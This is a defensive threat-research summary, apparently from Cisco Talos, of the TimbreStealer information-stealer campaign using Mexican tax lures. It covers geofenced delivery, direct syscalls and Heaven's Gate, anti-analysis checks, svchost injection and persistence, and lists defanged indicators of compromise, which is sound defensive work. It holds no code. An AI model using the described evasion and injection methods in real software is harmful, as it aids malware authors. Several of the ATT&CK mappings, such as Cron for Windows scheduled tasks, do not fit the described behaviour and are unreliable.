Threat Research

TimbreStealer campaign targets Mexican users with financial lures

Talos

Cisco Talos identified a Mexico-focused spam campaign that delivers a new obfuscated information stealer named TimbreStealer via compromised websites and WebDAV-based .url lures, using geofencing to serve payloads only to Mexican victims. The malware uses layered encrypted modules, direct syscalls including Heaven’s Gate transitions, and extensive anti-analysis checks to decrypt, load and persist a multi-stage payload. #TimbreStealer #Mispadu

Keypoints

  • Distribution: Spam emails with Mexican tax/CDFI lures redirect victims to compromised sites hosting Zip archives that contain .url shortcuts which use WebDAV to download the initial dropper.
  • Geofencing: Payload hosts return a blank PDF for non-Mexico visitors; JavaScript on sites checks geolocation and browser before serving the malicious Zip.
  • Multi-stage, encrypted architecture: Initial packed EXE embeds a DLL in .data; stages are decrypted sequentially using a global key that is re-encrypted at each step to prevent shortcutting.
  • Direct syscalls & Heaven’s Gate: Loader builds a Zw* export hash table, issues direct system calls to avoid API hooks, and uses Heaven’s Gate to execute 64-bit syscalls from a 32-bit process.
  • Anti-analysis and system-of-interest checks: Modules verify language/timezone, debug/sandbox indicators, VM artifacts, mutexes, registry keys and browser artifacts before decrypting later stages.
  • Loader & execution: Custom shellcode loaders (x86/x64) load stripped DLLs, use ZwCreateThreadEx for execution, and attempt injection into preferred svchost.exe processes with a 32-bit fallback shellcode option.
  • Capabilities & persistence: Final payload extracts from an ApplicationIcon.ico, can harvest browser credentials and OS/WMI data, POST multipart data to C2s, remove restore points, and establish persistence via scheduled tasks, registry run keys, or Group Policy.

MITRE Techniques

  • [T1566.002] Spearphishing Link – Used to deliver tax-themed links that redirect to compromised pages hosting Zip lures (‘Spearphishing Link’)
  • [T1566.001] Spearphishing Attachment – Distribution also used archive attachments/Zip files containing .url shortcuts (‘Spearphishing Attachment’)
  • [T1204.002] Malicious File – User interaction required to open the Zip and .url which triggers the malicious download (‘Malicious File’)
  • [T1105] Ingress Tool Transfer – Initial dropper and subsequent blobs are fetched from compromised web hosts and WebDAV servers (‘Ingress Tool Transfer’)
  • [T1190] Exploit Public-Facing Application – Attackers use compromised public websites to host and serve the payloads (‘Exploit Public-Facing Application’)
  • [T1071.001] Web Protocols – Payload downloads and C2 communication use HTTP/HTTPS and WebDAV (‘Web Protocols’)
  • [T1036.005] Masquerading: Match Legitimate Name or Location – .url and dropped files are named and iconified to appear as legitimate PDF/invoice files (‘Masquerading: Match Legitimate Name or Location’)
  • [T1483] Domain Generation Algorithms – Campaign uses many autogenerated domains and tokens for hosting drop sites (‘Domain Generation Algorithms’)
  • [T1071] Application Layer Protocol – Network communications and C2 exfiltration use application-layer HTTP protocols (‘Application Layer Protocol’)
  • [T1027.009] Embedded Payloads – Multiple payloads are embedded and encrypted inside .data sections and resource blobs (‘Obfuscated Files or Information: Embedded Payloads’)
  • [T1027.010] Command Obfuscation – .url and staged download logic include obfuscation to hinder detection (‘Obfuscated Files or Information: Command Obfuscation’)
  • [T1027.002] Software Packing – Initial executable is packed and submodules are compressed/decrypted at runtime (‘Obfuscated Files or Information: Software Packing’)
  • [T1564.001] Hidden Files and Directories – Malware drops files and may hide artifacts to persist and evade discovery (‘Hide Artifacts: Hidden Files and Directories’)
  • [T1497.003] Time Based Evasion – Time-based sandbox/VM evasion checks are used before progressing (‘Virtualization/Sandbox Evasion: Time Based Evasion’)
  • [T1497.001] System Checks – Language, timezone, debugger and desktop window counts are used to verify system-of-interest (‘Virtualization/Sandbox Evasion: System Checks’)
  • [T1497.002] User Activity Based Checks – Malware checks browser usage and user activity indicators to avoid sandboxes (‘Virtualization/Sandbox Evasion: User Activity Based Checks’)
  • [T1055.002] Portable Executable Injection – Attempts to inject the final 64-bit DLL into svchost.exe processes (‘Process Injection: Portable Executable Injection’)
  • [T1055.001] Dynamic-link Library Injection – Uses DLL loading/injection techniques (rundll32/iernonce.dll) as part of execution flow (‘Process Injection: Dynamic-link Library Injection’)
  • [T1055.012] Process Hollowing – Two-stage shellcode and modified thread contexts are used for code execution inside other processes (‘Process Injection: Process Hollowing’)
  • [T1140] Deobfuscate/Decode Files or Information – Multiple runtime decryption and decompression steps are used to obtain executable modules (‘Deobfuscate/Decode Files or Information’)
  • [T1574.002] DLL Side-Loading – Use of legitimate system binaries and overwritten DLLs supports side-loading and evasion (‘Hijack Execution Flow: DLL Side-Loading’)
  • [T1082] System Information Discovery – Malware collects WMI and registry information about OS, hardware, installed applications and profiles (‘System Information Discovery’)
  • [T1486] Data Encrypted for Impact – Malware contains routines to remove/modify System Restore (indicative of impact-oriented cleanup) (‘Data Encrypted for Impact’)
  • [T1070.001] Clear Windows Event Logs – Indicator removal techniques include modifying system artifacts (event/log clearing implicated) (‘Indicator Removal: Clear Windows Event Logs’)
  • [T1012] Query Registry – Extensive registry checks and use of registry-based persistence and keys are present (‘Query Registry’)
  • [T1204] User Execution: Malicious File – Attack relies on user opening the Zip and .url to trigger execution (‘User Execution: Malicious File’)
  • [T1053.003] Scheduled Task/Job: Cron – Malware registers scheduled tasks via ITaskService to trigger execution (‘Scheduled Task/Job: Cron’)
  • [T1053.005] Scheduled Task/Job: Scheduled Task – Uses Windows scheduled tasks and reg.exe to add RunOnce entries for execution (‘Scheduled Task/Job: Scheduled Task’)
  • [T1547.001] Registry Run Keys / Startup Folder – Persistence via Run keys and potential startup scripts (Group Policy) is implemented (‘Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder’)
  • [T1112] Modify Registry – Malware writes and reads registry keys as part of checks and persistence (‘Modify Registry’)

Indicators of Compromise

  • [Domains] Drop sites and C2 – pdf85[.]miramantolama[.]com/factura/74f871b7ca1977, suscripcion24[.]facturasonlinemx[.]com/factura/d6a6f8208ed508, and many other compromised Spanish-themed domains.
  • [IPs] Hosting infrastructure – 159[.]89[.]50[.]225 (WebDAV host), 69[.]64[.]35[.]1 (~route host), and multiple other IPs listed in the research.
  • [File hashes] Dropper and embedded binaries – 010b48762a033f91b32e315ebcefb8423d2b20019516fa8f2f3d54d57d221bdb, 024f3c591d44499afb8f477865c557fc15164ab0f35594e0cfdfa76245459762, and many more dropper hashes.
  • [File names] Notable filenames and artifacts – Cecujujajofubo475.dll (installed DLL), ApplicationIcon.ico (embedded final payload), CFDI_930209.zip / FACTURA_560208.zip (.zip lures) and .url shortcut filenames.

The campaign begins with targeted spam carrying Mexican tax-themed lures (CDFI/factura). Victims are redirected to compromised websites that run JavaScript region and browser checks; if the visitor is from Mexico the site serves a Zip archive named like CFDI_*.zip containing a .url internet shortcut. Those .url shortcuts invoke WebDAV downloads (rundll32 + davclnt.dll) to fetch the initial TimbreStealer dropper; if access is from outside Mexico the server instead returns a benign blank PDF.

On execution the packed first-stage executable extracts an embedded DLL from its .data section and enumerates Ntdll Zw* exports to build a hash table for direct syscalls. Sensitive APIs are invoked via direct syscalls and on 64-bit systems the loader employs a Heaven’s Gate transition to execute 64-bit syscalls from a 32-bit process, preventing standard user-mode API monitoring. The loader wipes MZ/PE headers of decrypted stages, uses a custom PE/shellcode loader to run stripped DLLs, and relies on a global decryption key that is re-encrypted at each stage so that any deviation in the expected execution path breaks subsequent decryption attempts.

The orchestrator and subsequent DLLs perform layered anti-analysis and system-of-interest checks (system language/timezone, debugger hooks, desktop/window counts, VM strings, mutexes, specific registry keys and browser usage). If checks pass, submodules (including x86/x64 shellcode loaders, anti-VM, decompression modules and installer) are decrypted and executed—often via ZwCreateThreadEx and injected into preferred svchost.exe processes (searching for DcomLaunch, Power, BrokerInfrastructure, LSM, Schedule). The installed DLLs add further protections (TLS callbacks, extra encryption rounds tied to parent process and registry), overwrite in-memory DLLs with clean copies to remove user-mode hooks, and extract the final payload from an ApplicationIcon.ico resource. Capabilities observed or implied in the final payload include harvesting browser credentials (SQLite), scanning for targeted file types and directories, collecting WMI/registry system information, performing multipart HTTP POSTs to C2 endpoints, and routines to remove or alter System Restore artifacts; persistence is achieved via scheduled tasks, Run key entries and optional Group Policy startup scripts.

Read more: https://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/